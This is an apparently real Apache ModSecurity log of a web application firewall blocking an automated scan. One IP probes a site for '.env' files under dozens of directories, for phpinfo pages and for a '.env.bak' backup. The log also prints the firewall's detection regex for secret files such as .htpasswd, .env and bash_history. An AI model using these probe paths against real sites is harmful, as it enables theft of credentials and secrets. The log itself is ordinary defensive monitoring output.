[Tue May 26 14:30:09.470579 2026] [security2:error] [pid 606909:tid 607128] [client 195.178.110.199:33030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/market/.env"] [unique_id "ahVhGV0yRtX9qA7aVUV02wAAAN4"]
[Tue May 26 14:30:09.476279 2026] [security2:error] [pid 606909:tid 607123] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/marketing/.env"] [unique_id "ahVhGV0yRtX9qA7aVUV03AAAANk"]
[Tue May 26 14:30:09.602230 2026] [security2:error] [pid 610693:tid 610937] [client 195.178.110.199:32972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/media/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvmwAAAHI"]
[Tue May 26 14:30:09.645426 2026] [security2:error] [pid 606909:tid 607092] [client 195.178.110.199:33016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node-api/.env"] [unique_id "ahVhGV0yRtX9qA7aVUV04AAAALo"]
[Tue May 26 14:30:09.648976 2026] [security2:error] [pid 610693:tid 610864] [client 195.178.110.199:32890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/lms/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvngAAACk"]
[Tue May 26 14:30:09.656035 2026] [security2:error] [pid 610693:tid 610854] [client 195.178.110.199:33012] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvoAAAAB8"]
[Tue May 26 14:30:09.750824 2026] [security2:error] [pid 610693:tid 610865] [client 195.178.110.199:32988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/old/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvpAAAACo"]
[Tue May 26 14:30:09.789882 2026] [security2:error] [pid 606909:tid 607078] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/opt/.env"] [unique_id "ahVhGV0yRtX9qA7aVUV05wAAAKw"]
[Tue May 26 14:30:09.850760 2026] [security2:error] [pid 606909:tid 607094] [client 195.178.110.199:33016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node/api/.env"] [unique_id "ahVhGV0yRtX9qA7aVUV06AAAALw"]
[Tue May 26 14:30:09.854749 2026] [security2:error] [pid 610693:tid 610901] [client 195.178.110.199:48050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/node/backend/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvpwAAAE4"]
[Tue May 26 14:30:09.859876 2026] [security2:error] [pid 610693:tid 610846] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/nodeweb/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvqAAAABc"]
[Tue May 26 14:30:09.971094 2026] [security2:error] [pid 610693:tid 610863] [client 195.178.110.199:32890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/new/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvrgAAACg"]
[Tue May 26 14:30:10.016059 2026] [security2:error] [pid 610693:tid 610879] [client 195.178.110.199:32894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/nodeapi/.env"] [unique_id "ahVhGjvNO3hpmlY6M8RvsgAAADg"]
[Tue May 26 14:30:10.210283 2026] [security2:error] [pid 610693:tid 610838] [client 195.178.110.199:32902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/php.php"] [unique_id "ahVhGjvNO3hpmlY6M8RvuAAAAA8"]
[Tue May 26 14:30:10.242945 2026] [security2:error] [pid 610693:tid 610909] [client 195.178.110.199:33012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/phpinfo.php"] [unique_id "ahVhGjvNO3hpmlY6M8RvvAAAAFY"]
[Tue May 26 14:30:10.284532 2026] [security2:error] [pid 606909:tid 607143] [client 195.178.110.199:48154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/portal/.env"] [unique_id "ahVhGl0yRtX9qA7aVUV09AAAAO0"]
[Tue May 26 14:30:10.317023 2026] [security2:error] [pid 610693:tid 610853] [client 195.178.110.199:32894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/php-info.php"] [unique_id "ahVhGjvNO3hpmlY6M8RvvwAAAB4"]
[Tue May 26 14:30:10.369717 2026] [security2:error] [pid 606909:tid 607039] [client 195.178.110.199:33030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/php_info.php"] [unique_id "ahVhGl0yRtX9qA7aVUV09wAAAIU"]
[Tue May 26 14:30:10.383281 2026] [security2:error] [pid 610693:tid 610930] [client 195.178.110.199:32972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/prod/.env"] [unique_id "ahVhGjvNO3hpmlY6M8RvwQAAAGs"]
[Tue May 26 14:30:10.392393 2026] [security2:error] [pid 606909:tid 607108] [client 195.178.110.199:33016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/product/.env"] [unique_id "ahVhGl0yRtX9qA7aVUV0-AAAAMo"]
[Tue May 26 14:30:10.434133 2026] [security2:error] [pid 606909:tid 607072] [client 195.178.110.199:48154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/production/.env"] [unique_id "ahVhGl0yRtX9qA7aVUV0-gAAAKY"]
[Tue May 26 14:30:10.531428 2026] [security2:error] [pid 610693:tid 610891] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public-api/.env"] [unique_id "ahVhGjvNO3hpmlY6M8RvxAAAAEQ"]
[Tue May 26 14:30:10.637506 2026] [security2:error] [pid 610693:tid 610911] [client 195.178.110.199:32890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public_html/.env"] [unique_id "ahVhGjvNO3hpmlY6M8RvxwAAAFg"]
[Tue May 26 14:30:10.683074 2026] [security2:error] [pid 610693:tid 610871] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/qa/.env"] [unique_id "ahVhGjvNO3hpmlY6M8RvyQAAADA"]
[Tue May 26 14:30:10.727454 2026] [security2:error] [pid 606909:tid 607057] [client 195.178.110.199:33016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public/phpinfo.php"] [unique_id "ahVhGl0yRtX9qA7aVUV0_QAAAJc"]
[Tue May 26 14:30:10.817476 2026] [security2:error] [pid 610693:tid 610941] [client 195.178.110.199:32966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/project/.env"] [unique_id "ahVhGjvNO3hpmlY6M8Rv0QAAAHY"]
[Tue May 26 14:30:11.003118 2026] [security2:error] [pid 610693:tid 610883] [client 195.178.110.199:32968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/public/.env"] [unique_id "ahVhGzvNO3hpmlY6M8Rv3wAAADw"]
[Tue May 26 14:30:11.300038 2026] [security2:error] [pid 610693:tid 610851] [client 195.178.110.199:32968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/s3/.env.bak"] [unique_id "ahVhGzvNO3hpmlY6M8Rv7wAAABw"]
[Tue May 26 14:30:11.453498 2026] [security2:error] [pid 610693:tid 610888] [client 195.178.110.199:32952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/.env"] [unique_id "ahVhGzvNO3hpmlY6M8Rv9QAAAEE"]
[Tue May 26 14:30:11.478045 2026] [security2:error] [pid 610693:tid 610940] [client 195.178.110.199:32910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/api/.env"] [unique_id "ahVhGzvNO3hpmlY6M8Rv9wAAAHU"]
[Tue May 26 14:30:11.606157 2026] [security2:error] [pid 606909:tid 607045] [client 195.178.110.199:32936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/server/backend/.env"] [unique_id "ahVhG10yRtX9qA7aVUV1FAAAAIs"]
[Tue May 26 14:30:11.681407 2026] [security2:error] [pid 610693:tid 610729] [remote 95.216.117.13:57240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVhGzvNO3hpmlY6M8Rv-gAAOiM"]
[Tue May 26 14:30:11.713974 2026] [security2:error] [pid 610693:tid 610850] [client 195.178.110.199:32952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/service/.env"] [unique_id "ahVhGzvNO3hpmlY6M8RwCwAAABs"]
[Tue May 26 14:30:11.723007 2026] [security2:error] [pid 610693:tid 610835] [client 195.178.110.199:32968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/services/.env"] [unique_id "ahVhGzvNO3hpmlY6M8RwDQAAAAw"]
[Tue May 26 14:30:11.852834 2026] [security2:error] [pid 606909:tid 607141] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/shop/.env"] [unique_id "ahVhG10yRtX9qA7aVUV1GQAAAOs"]
[Tue May 26 14:30:11.955448 2026] [security2:error] [pid 610693:tid 610829] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/shared/.env"] [unique_id "ahVhGzvNO3hpmlY6M8RwHgAAAAY"]
[Tue May 26 14:30:11.992649 2026] [security2:error] [pid 610693:tid 610827] [client 195.178.110.199:32966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/src/.env"] [unique_id "ahVhGzvNO3hpmlY6M8RwIwAAAAQ"]
[Tue May 26 14:30:12.157854 2026] [security2:error] [pid 610693:tid 610904] [client 195.178.110.199:32972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/srv/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwKQAAAFE"]
[Tue May 26 14:30:12.207201 2026] [security2:error] [pid 606909:tid 607144] [client 195.178.110.199:48154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/staging/.env"] [unique_id "ahVhHF0yRtX9qA7aVUV1JAAAAO4"]
[Tue May 26 14:30:12.267315 2026] [security2:error] [pid 610693:tid 610941] [client 195.178.110.199:32910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stg/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwMAAAAHY"]
